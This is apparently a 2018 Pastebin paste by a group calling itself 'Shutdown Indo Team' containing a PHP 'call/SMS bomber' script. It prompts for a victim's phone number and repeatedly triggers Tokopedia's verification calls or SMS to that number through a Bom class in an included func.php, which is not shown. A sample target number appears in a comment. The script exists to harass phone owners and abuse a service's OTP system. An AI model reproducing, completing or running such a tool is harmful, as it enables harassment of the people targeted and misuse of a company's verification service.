Advertisement
Guest User

ShutdownIndoTeam/spam tokopedia

a guest
May 24th, 2018
483
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.81 KB | None | 0 0
  1. [+]====================================[+]
  2.  
  3. # SPAM TELEPON TOKOPEDIA #
  4. ------------------------
  5.  
  6. By = Shutdown Indo Team
  7.  
  8. Member SIT = |Mr.SIT_GM | Mr.X7_SIT | Mr.Ay | Mr.X-SIT | Pay | Mr.JKT-X | Mr.TK_SIT | SIT_LIZ4RD | F1R_M4.Ripper | Z5.W1N474 | Mr.Bee | Sunthree_bbc |
  9.  
  10. [+]=========================[==========[+]
  11.  
  12. <?php
  13. include 'func.php';
  14.  
  15.  
  16. $init = new Bom();
  17.  
  18. //Eksekusi Call/Sms Boomber (Limit 3x/Jam)
  19.  
  20. echo "Nomor? (ex : 628xxxx)\nInput : ";
  21. $a = trim(fgets(STDIN));
  22. $init->no = "$a";
  23. $init->type = 2; //Type 2 untuk telpon, Type 1 untuk sms
  24. //$init->no = "085346324563"; //Nomer Hp target
  25.  
  26. if ($init->type == 1) {
  27. for ($i=0; $i < 2; $i++) {
  28. $init->Verif($init->no,$init->type);
  29. }
  30. }elseif ($init->type == 2) {
  31. $init->Verif($init->no,$init->type);
  32. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement